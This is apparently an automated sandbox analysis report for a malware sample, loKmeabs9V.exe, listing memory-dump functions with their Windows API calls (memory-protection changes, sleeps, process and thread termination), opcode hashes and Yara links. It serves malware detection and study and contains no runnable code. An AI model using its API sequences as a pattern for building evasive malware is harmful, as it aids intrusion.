                                Function 022B5423, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                • TerminateProcess.KERNELBASE(CAF71672,-70DBCC6D), ref: 022B5486
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: ProcessTerminate
                                • String ID:
                                • API String ID: 560597551-0
                                • Opcode ID: f08cd3d482bcb8a111b452d379a654f524c3849631bc8ae69e31eea398f09bda
                                • Instruction ID: 8c374a4a4e114c899a8458422740f9bc9c9a37ac3ba332edc9bdb673311c23d0
                                • Opcode Fuzzy Hash: f08cd3d482bcb8a111b452d379a654f524c3849631bc8ae69e31eea398f09bda
                                • Instruction Fuzzy Hash: 8DE02B321441449FDB384F359C697CE63775FA1140F55012F5C06A7220CA71424B8A0C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B706D, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                Download Yara Rule
                                APIs
                                • GetLongPathNameW.KERNELBASE(?,?), ref: 022B719E
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID:
                                • API String ID: 82841172-0
                                • Opcode ID: 2c9898fdcd5560d16ed68bc623b881be68a2b01e7bcc7de6a9a44550f9c6d16c
                                • Instruction ID: 1fd131c8de83f6865d696e3d736249a2379abaaf849208cf47b1d16070806fda
                                • Opcode Fuzzy Hash: 2c9898fdcd5560d16ed68bc623b881be68a2b01e7bcc7de6a9a44550f9c6d16c
                                • Instruction Fuzzy Hash: 4CE06D3A0482869FCB649F10C9556EEBBB2FFA4394F42042DACCA4B320C7305E44CB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B65BA, Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: f6d6a345d1c0910a54313c765892c7add5f62fbf0d517728caedbe43cf371894
                                • Instruction ID: ee52669b5f92f3a1460d23f1e9b8a545f0fb803bf6952f3d40391f63460f9cc5
                                • Opcode Fuzzy Hash: f6d6a345d1c0910a54313c765892c7add5f62fbf0d517728caedbe43cf371894
                                • Instruction Fuzzy Hash: DCC022722E120C0DC513B2A504092F817010FE0380799C02A809A5A64CCE6382DFA6E2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B5BEC, Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: efb4d505addaac341ec95b27c443f6ab3a3059729da0d89f5ddad004e7bcdb75
                                • Instruction ID: 0b7217fdab338bd7c65c4eae6bf033ed856bef7bbcf2cdcfdfd5849448741b1b
                                • Opcode Fuzzy Hash: efb4d505addaac341ec95b27c443f6ab3a3059729da0d89f5ddad004e7bcdb75
                                • Instruction Fuzzy Hash: CCC022722E520C4AC103B2A1041A2F917090FE03807A9C02A806A0B54DCE6382EDAAF2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 022B2C93, Relevance: 3.1, Strings: 2, Instructions: 559COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: 8fd$gL="
                                • API String ID: 1029625771-859432238
                                • Opcode ID: b2c1b5db5870e2bfd76e05645806a9eb5e133c70b7393a78c689f74d7cb148a7
                                • Instruction ID: c229af7100eb1b0f9f06ce730c4e0db0cdb58978a00d88509d186ad7866905fe
                                • Opcode Fuzzy Hash: b2c1b5db5870e2bfd76e05645806a9eb5e133c70b7393a78c689f74d7cb148a7
                                • Instruction Fuzzy Hash: D4329D71A147469FDB28CF68CC94BDAB7E2FF88350F45822AEC5D9B354D730A9418B84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B2889, Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: r*4$~nh
                                • API String ID: 0-3726668126
                                • Opcode ID: 6a71fc3b939dc425db6e6d837f571730bbe6b85183f2856e2873a6e0d24934eb
                                • Instruction ID: 1e32928a9a5e8b7ee8cbb3f8e849f2c327f6dd48eaec7d42da80e02bfe3de1a7
                                • Opcode Fuzzy Hash: 6a71fc3b939dc425db6e6d837f571730bbe6b85183f2856e2873a6e0d24934eb
                                • Instruction Fuzzy Hash: 7571AD756183499FDB74DE79C888BDABBE2FF98340F45841DEC8D9B618D3309A418B42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B149C, Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Qp a
                                • API String ID: 0-2838866663
                                • Opcode ID: d144fc08afc28a9b6f3639555700dc7b9b1cb18a67e608cc144923423771fe14
                                • Instruction ID: dc21889acdd8ab89533402783e3d64f3d40c3d185421e43b3cf10422a108a6bd
                                • Opcode Fuzzy Hash: d144fc08afc28a9b6f3639555700dc7b9b1cb18a67e608cc144923423771fe14
                                • Instruction Fuzzy Hash: F38123726143488FCB359F78CC59BEA7BA2AF94390F1A022DCC8A9B655C3705582CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B151C, Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Qp a
                                • API String ID: 0-2838866663
                                • Opcode ID: 04b7b69afdb98262e54dd29dfc595b13807d4c71a9a54e7c835b77a7fa3d19fc
                                • Instruction ID: fd9fcdf7f4be00f7c3a1b90f87654dcd270286d0960e01286c6675f4b0ae7055
                                • Opcode Fuzzy Hash: 04b7b69afdb98262e54dd29dfc595b13807d4c71a9a54e7c835b77a7fa3d19fc
                                • Instruction Fuzzy Hash: 117125726143448FCB359F78CC59BEA3BB2BF95390F1A422DCC899B659C3745582CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B36C3, Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: lue
                                • API String ID: 0-2265836759
                                • Opcode ID: 86586550857f9cd0c4f4274755212964a2be99cdb15954fa5a16eaa5aaf4d111
                                • Instruction ID: 9241d295166a80070ee2d4c56b85bd5532a2b5546cdba02a17b08eca78c633b9
                                • Opcode Fuzzy Hash: 86586550857f9cd0c4f4274755212964a2be99cdb15954fa5a16eaa5aaf4d111
                                • Instruction Fuzzy Hash: 0E714371A18380CFDB219F74CC88BDAB7A1BF04360F56458DED999B265C3709A80CF82
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B30BC, Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8fd
                                • API String ID: 0-256658910
                                • Opcode ID: 4950660b68f7d93c96224b03294a42b6b866fb38b07ef0aead162236f6dec4ad
                                • Instruction ID: a6011fab03dcd54d70e43fcf7cbf9b9330bc570f579252978f84163bab311467
                                • Opcode Fuzzy Hash: 4950660b68f7d93c96224b03294a42b6b866fb38b07ef0aead162236f6dec4ad
                                • Instruction Fuzzy Hash: 4661BE72A5074ACFDB25CF68C8847DAB7E2BF48310F58422ADC599B314DB70AA408B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B1654, Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Qp a
                                • API String ID: 0-2838866663
                                • Opcode ID: 490c9ddf7db84f876874a0aecb36c931925483a16838878dfa9f911ff01d31b5
                                • Instruction ID: 0c64ca1f03a047398baeea03c236989165c39a40edd9471d29ff90865b4ce205
                                • Opcode Fuzzy Hash: 490c9ddf7db84f876874a0aecb36c931925483a16838878dfa9f911ff01d31b5
                                • Instruction Fuzzy Hash: 585147726143888FCB319E78CC597EE77F2AF94394F1A021DCCC99B659C3719A428B42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B1D5A, Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Da
                                • API String ID: 0-3380597304
                                • Opcode ID: 1807164b41f7efe86fa08a90ae49029a08da702a0b381605a4bf2a1efd395393
                                • Instruction ID: 4eb173785751bd94a4aa049dd2b4a40afb1c4ad6806a4c1662e7bea9c1ad5488
                                • Opcode Fuzzy Hash: 1807164b41f7efe86fa08a90ae49029a08da702a0b381605a4bf2a1efd395393
                                • Instruction Fuzzy Hash: E351A076A007899FCB31CF6ACD58BDB7BE6AFD9350F45812ADD4C9B218D3305A818B41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B3A2E, Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: DPy
                                • API String ID: 0-2132550623
                                • Opcode ID: 1093df66b315300588ab63aa6032053f9c9a8ecef687cc6172675307b68e886f
                                • Instruction ID: 5ed0eed9f69826bee459bede4b5b31f6cc7830a55f20081198b9b9309157efd6
                                • Opcode Fuzzy Hash: 1093df66b315300588ab63aa6032053f9c9a8ecef687cc6172675307b68e886f
                                • Instruction Fuzzy Hash: 1E11C835906264CFDBB0CE799E847DB7766FFD4740F52811A9D886B208C3305A828B86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B41E6, Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: h%U
                                • API String ID: 0-603279075
                                • Opcode ID: 654165b74f45372d1c94e04486d41755ebe3260eb2a76bf08f88dce2fac565bd
                                • Instruction ID: c84a1d627a61a52597379f28317e931b4f4c0d9c16b0e8ff5099a36ec967ccf0
                                • Opcode Fuzzy Hash: 654165b74f45372d1c94e04486d41755ebe3260eb2a76bf08f88dce2fac565bd
                                • Instruction Fuzzy Hash: FE113872518348AFD7609EB98C84BDB77EAAF48350F06051AAC58EB514D270DA84CB02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B8923, Relevance: .4, Instructions: 360COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6799bb1270a8208c05968e89d8cdccbf9d56f6d553f02e8c4fb5af70e5d769dd
                                • Instruction ID: 2be73718a52990a6114e2db3fb9b598c1ca41f08bf6140adbdf2b22a8968d9f4
                                • Opcode Fuzzy Hash: 6799bb1270a8208c05968e89d8cdccbf9d56f6d553f02e8c4fb5af70e5d769dd
                                • Instruction Fuzzy Hash: D2D106305193C28EDB328F7C8898BCA6F964F17354FA8C29AC5994F39BE2754106C792
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B8098, Relevance: .2, Instructions: 249COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 265b33fcc02bb4eda5e86b4eb97456cbd0bed7bc7feffe628b4f29d47d98e11b
                                • Instruction ID: a0b032f4dfa252bd66b5582896c43afd869d4e33d8408eab4ffbd310b0412007
                                • Opcode Fuzzy Hash: 265b33fcc02bb4eda5e86b4eb97456cbd0bed7bc7feffe628b4f29d47d98e11b
                                • Instruction Fuzzy Hash: F28118345662869FD7314EAC8890BCB27AB9F16384FE4461ACD099F70BE372A545C7C2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B19F4, Relevance: .2, Instructions: 215COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cc3c8345f2ebb02002316c9586312f9d35d5341635ce00bd1b6f155fb289de3d
                                • Instruction ID: 7bf37266e071fb0bf66e05c082e591b4c3942048d1b198a7e1bfdb2a41b055a7
                                • Opcode Fuzzy Hash: cc3c8345f2ebb02002316c9586312f9d35d5341635ce00bd1b6f155fb289de3d
                                • Instruction Fuzzy Hash: A471137045B6C29BD3228E6C8855BC76B579F17324BE8838EDA484F78BE3667115C3D0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B82DC, Relevance: .2, Instructions: 161COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f11d9956a5a3959d4f52597242589e3b266a6103083b263185666f8bb0432dd
                                • Instruction ID: c47649e130127f220a7450731bc26dbf3a3c9ca5fc0b8196d7f3b51426453b2d
                                • Opcode Fuzzy Hash: 3f11d9956a5a3959d4f52597242589e3b266a6103083b263185666f8bb0432dd
                                • Instruction Fuzzy Hash: 92510436919385CFCB31CF7988917DA7BB6BF09384F58842ACC8D9B209D370A945CB56
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B3EE1, Relevance: .1, Instructions: 147COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 83a5ae5d6cd18b300ef2bcb010f693b1507227049fe71e898e24e97960e6cb3c
                                • Instruction ID: a6a226873a2843d965d8ceaa97cb0f3f3d2cef9b0e24f9e49688de4013820da2
                                • Opcode Fuzzy Hash: 83a5ae5d6cd18b300ef2bcb010f693b1507227049fe71e898e24e97960e6cb3c
                                • Instruction Fuzzy Hash: 80512772A24345EFDB35DEA9C9E53DA37E2AF59380F04052EC80DAB61AE770B941C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B8324, Relevance: .1, Instructions: 119COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9f75a37939ab88ffb55ac4fba7b958fb42d930ac9ec9678f0c7baa06069211e6
                                • Instruction ID: 394915371fdf1cd70b346382327f6a41424ee4a4c6de7ee60773f989561aa492
                                • Opcode Fuzzy Hash: 9f75a37939ab88ffb55ac4fba7b958fb42d930ac9ec9678f0c7baa06069211e6
                                • Instruction Fuzzy Hash: B941C335A64389DFCB71CF6988907DA77B6BF08380F89451ADC4DEB204D330A9818B56
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B8294, Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cfe9b38e11e07c8c1843ffe7d16384f77f469b086364a2a835b7cc47736b0c5e
                                • Instruction ID: 95b85b43ced64d9af007eeaafaad361d535a710575268e08ca178931c91d0581
                                • Opcode Fuzzy Hash: cfe9b38e11e07c8c1843ffe7d16384f77f469b086364a2a835b7cc47736b0c5e
                                • Instruction Fuzzy Hash: 4B41B475A24389DFCB71CF6988907DA37B6FF08380F89452ADC4DEB204D330A9818B56
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B1940, Relevance: .1, Instructions: 115COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                • Opcode ID: e976512adf42a38eeafe88a3d9c0bc0b9b2d92210c409638c58be359c6d3839c
                                • Instruction ID: 7ce85b46c3bbe8653c2241a23e242caca234898ea7b987eeaec0a630ba1ef91f
                                • Opcode Fuzzy Hash: e976512adf42a38eeafe88a3d9c0bc0b9b2d92210c409638c58be359c6d3839c
                                • Instruction Fuzzy Hash: 9351B331409AD69BC7328F3C8C15BEABFA16F46330F49838EC8999B2D6C3712511CB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B7921, Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bddb5f4544a898af7abeacbddb87c23466c3654345383bba92b87ae9fe36aff7
                                • Instruction ID: a32ebbc04ff41ca943bff9d60b951646517fc2f9bb8218d6decc8ef30aadc9f0
                                • Opcode Fuzzy Hash: bddb5f4544a898af7abeacbddb87c23466c3654345383bba92b87ae9fe36aff7
                                • Instruction Fuzzy Hash: 7721C336A1438B8FCB31DF68D9C13EEB7A2FFAA784F454058DC888B205E2789955C604
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B7B16, Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 76725b2ff9a5b77ec050a76e7a1396c4d2353ee1fe1f70c6b6ba6d27bcd71d19
                                • Instruction ID: 401804e5d70ea16296eda1ed06482c802659c8d0b886499c1abf54e06143a353
                                • Opcode Fuzzy Hash: 76725b2ff9a5b77ec050a76e7a1396c4d2353ee1fe1f70c6b6ba6d27bcd71d19
                                • Instruction Fuzzy Hash: 6C018B32221248CFCB25CF18C8C8AE9B3B1BF98360F26446AEC468B310C370AE41CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B73AF, Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3e9abbd96101dca4913a53d1a37aff396c88927aa430c81e2cb121ea0d3ce6c5
                                • Instruction ID: c9d8119c26d991f1ed2e0880cd9682dd9cc7362aa83ab0b2f38abf2de9c91d82
                                • Opcode Fuzzy Hash: 3e9abbd96101dca4913a53d1a37aff396c88927aa430c81e2cb121ea0d3ce6c5
                                • Instruction Fuzzy Hash: 31C02B3550030207DB364F90C441B67F260EF5B320F10E03D81035B185E2F888C14018
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B548E, Relevance: .0, Instructions: 9COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 204b9d85454be2230e613514e098da5b6522b06d8ca01098c84f97446119f7ad
                                • Instruction ID: bc8e3cf0c47b5eb6f8c55dd72849ae194ef91611edf3d8096f27e0bc405badcd
                                • Opcode Fuzzy Hash: 204b9d85454be2230e613514e098da5b6522b06d8ca01098c84f97446119f7ad
                                • Instruction Fuzzy Hash: 32C048F6222581CFEB12DA88C4A1B9173A5EB24689BC40490E403CFB16C228ED11CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B73F1, Relevance: .0, Instructions: 5COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 13bcaf993096cd6c3b7342c14149681abad214693972ad1ae3544e5900d590c3
                                • Instruction ID: c241b3f5efd54cf35cf40e27ad961033f2e5d5d87e17bf41ba57d53856cd5df8
                                • Opcode Fuzzy Hash: 13bcaf993096cd6c3b7342c14149681abad214693972ad1ae3544e5900d590c3
                                • Instruction Fuzzy Hash: 37B002753526408FD655CE1AC190F5573A4BB44A51F415494E81187B15D764E9009910
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: loKmeabs9V.exe PID: 476 Parent PID: 1536 loKmeabs9V.exeCOMMON

                                Executed Functions

                                Function 00569DCF, Relevance: 3.0, APIs: 2, Instructions: 42sleepnativeCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(?), ref: 00569E04
                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101B,-00000017), ref: 00569E42
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: MemoryProtectSleepVirtual
                                • String ID:
                                • API String ID: 3235210055-0
                                • Opcode ID: 647f19fc3301da9bb4d956535a6b03a10f803f969a66c6d12d04e28fe2523f94
                                • Instruction ID: cd01f9307bd49b1e0780fb2ec2be5767b2520a5c91d2e9c96a4fd8967969ace2
                                • Opcode Fuzzy Hash: 647f19fc3301da9bb4d956535a6b03a10f803f969a66c6d12d04e28fe2523f94
                                • Instruction Fuzzy Hash: 8B019AB1900701DFE7518F24C84DB89BBA8BF14375F168295A9219B0F6E3B489808F51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00569CF6, Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00569D6F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                • Opcode ID: 20bd199065d73e8b6841f05225e4c53a2fb717fed42a1c384dcd0e32ce7a0eb4
                                • Instruction ID: d4a14cc55a0df576286e241115d664b2eb82382910f07df61969e800c97d0bbd
                                • Opcode Fuzzy Hash: 20bd199065d73e8b6841f05225e4c53a2fb717fed42a1c384dcd0e32ce7a0eb4
                                • Instruction Fuzzy Hash: D91176B11003108FE761CF7CCB82B463F69FF5A364B6542E4DA05DB166DBB4D8828664
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00569CF1, Relevance: 1.6, APIs: 1, Instructions: 61nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00569D6F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                • Opcode ID: 9682a12a96269c558ec6fc3c15bf71f1ac31e0d869be6c6b254c837c7cdb3470
                                • Instruction ID: 74681fdf73a7ad959189d112f68a67ec33a25aadb9dc7cc3c7f5216a214bb8c1
                                • Opcode Fuzzy Hash: 9682a12a96269c558ec6fc3c15bf71f1ac31e0d869be6c6b254c837c7cdb3470
                                • Instruction Fuzzy Hash: D71148B11003209FE751CB78C686B463F69FF45360B1242E4EA159B176D774D8818634
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00569BE5, Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                Download Yara Rule
                                APIs
                                • TerminateThread.KERNELBASE ref: 00569C5D
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: TerminateThread
                                • String ID:
                                • API String ID: 1852365436-0
                                • Opcode ID: e389f90133ea9c2fc262cd1e27c56c568b281f3a092db88663f824e5403ef180
                                • Instruction ID: 86e3ae231100eeb424949e909077443b88071b2a682525465d1534988e64150d
                                • Opcode Fuzzy Hash: e389f90133ea9c2fc262cd1e27c56c568b281f3a092db88663f824e5403ef180
                                • Instruction Fuzzy Hash: 28F0F675645382CFD7315E39DD492DABFA2AFC1310F16402FCDC18B251E33104968B16
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00569BF4, Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                                Download Yara Rule
                                APIs
                                • TerminateThread.KERNELBASE ref: 00569C5D
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: TerminateThread
                                • String ID:
                                • API String ID: 1852365436-0
                                • Opcode ID: c75275c94542f93fa643ff1e11fe3d3d5e7f2c1951bdf5fa58247b1783c892b8
                                • Instruction ID: ce780c0cc63a53d55bb66956af69375d507c73ce7e79026e6ce7e141ec024276
                                • Opcode Fuzzy Hash: c75275c94542f93fa643ff1e11fe3d3d5e7f2c1951bdf5fa58247b1783c892b8
                                • Instruction Fuzzy Hash: 6DF09035A04341CFDB359E29DE892DABBA6BFC4710F22802FCE858B255E37104968B16
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00569DCA, Relevance: 1.3, APIs: 1, Instructions: 24sleepnativeCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNELBASE(?), ref: 00569E04
                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101B,-00000017), ref: 00569E42
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1285743420.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false
                                Similarity
                                • API ID: MemoryProtectSleepVirtual
                                • String ID:
                                • API String ID: 3235210055-0
                                • Opcode ID: 3274499f624ec7c5a8cb17dd6e906771ffc1a91d4e672d6868317b70b114a870
                                • Instruction ID: 4352a1a14262ba8591455d9e7b059b9a7a862b05818794b69195b368222ea480
                                • Opcode Fuzzy Hash: 3274499f624ec7c5a8cb17dd6e906771ffc1a91d4e672d6868317b70b114a870
                                • Instruction Fuzzy Hash: 1BE04870A14302DFE7609FB0C58DB44BA647F05330F198595A9055B1D3E770C881D915
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Analysis Process: loKmeabs9V.exe PID: 3576 Parent PID: 476 loKmeabs9V.exeCOMMON

                                Executed Functions

                                Function 0040DD85, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040DDAD
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
